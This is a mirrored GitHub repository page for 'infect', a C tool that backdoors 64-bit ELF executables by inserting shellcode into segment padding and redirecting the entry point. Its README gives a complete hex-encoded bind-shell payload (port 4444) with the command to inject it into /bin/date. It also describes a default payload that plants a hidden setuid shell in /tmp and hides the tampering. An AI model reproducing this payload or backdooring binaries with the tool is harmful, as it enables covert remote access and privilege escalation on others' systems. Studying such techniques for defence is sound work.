https://github.com/brimstone/infect

Simple C program to backdoor ELF executables
https://github.com/brimstone/infect

backdoor elf elf64 shellcode

Last synced: 8 months ago
JSON representation

Simple C program to backdoor ELF executables

• Host: GitHub
• URL: https://github.com/brimstone/infect
• Owner: brimstone
• License: gpl-2.0
• Created: 2018-10-13T21:01:24.000Z (over 7 years ago)
• Default Branch: master
• Last Pushed: 2020-03-25T01:28:36.000Z (about 6 years ago)
• Last Synced: 2025-04-19T15:20:00.945Z (11 months ago)
• Topics: backdoor, elf, elf64, shellcode
• Language: C
• Size: 17.6 KB
• Stars: 7
• Watchers: 2
• Forks: 6
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
infect

------

> Simple C program to backdoor ELF executables

This is a simple program, written in C, to add arbitrary shellcode to 64bit ELF

executables. This is a heavily modified version of `infect` from the ELFKickers

project from Muppet Labs.

Usage

-----

```

Usage: ./infect

  -f: Path to 64bit ELF binary to infect with the payload.

  -p: Hex encoding of the payload.

  -v: Be verbose.

  -l: Only show how much room is available for a payload.

Example:

./infect -f /bin/date -p 6a2958996a025f6a015e0f05489752c \

704240200115c4889e66a105a6a31580f056a32580f054831f66a2b580f \

0548976a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f73680 \

0534889e752574889e60f05

Infects /bin/date with a bind shell on port 4444

```

Build

-----

This project uses `make` to build.

Original README

---------------

infect provides a very simple example of how an ELF executable can be

subverted to compromise security. (Of course, this is not a very

practical approach if compromising security is really your goal, since

it requires already having write access to someone else's executables.

The true purpose here is simply to illustrate one technique for

surgically altering ELF files.)

Given a 64-bit ELF executable file, this program inserts into it a

snippet of malicious code. When the modified executable is next

invoked, the added code creates a file named "/tmp/.~", a 32-bit ELF

executable that simply invokes /bin/sh, and has the set-user-ID bit

set. The added code then jumps to the original program so that the

modified executable shows no obvious sign of having been tampered

with.

infect takes advantage of the fact that most ELF executables are laid

out with a significant chunk of unused padding bytes immediately

following the executable segment. infect simply extends the size of

the executable segment to include enough extra bytes to hold the new

code, and then changes the executable's entry point.

The malicious code provided with infect is very simple, and only

requires 116 bytes. (58 of those bytes are for the generated ELF

executable.) Further analysis of this assembly code is left as an

exercise for the reader.

License

-------

- Copyright (c) 2011 Brian Raiter 

- Copyright (c) 2018 

License GPLv2+: GNU GPL version 2 or later. This is free software: you

are free to change and redistribute it. There is NO WARRANTY, to the

extent permitted by law.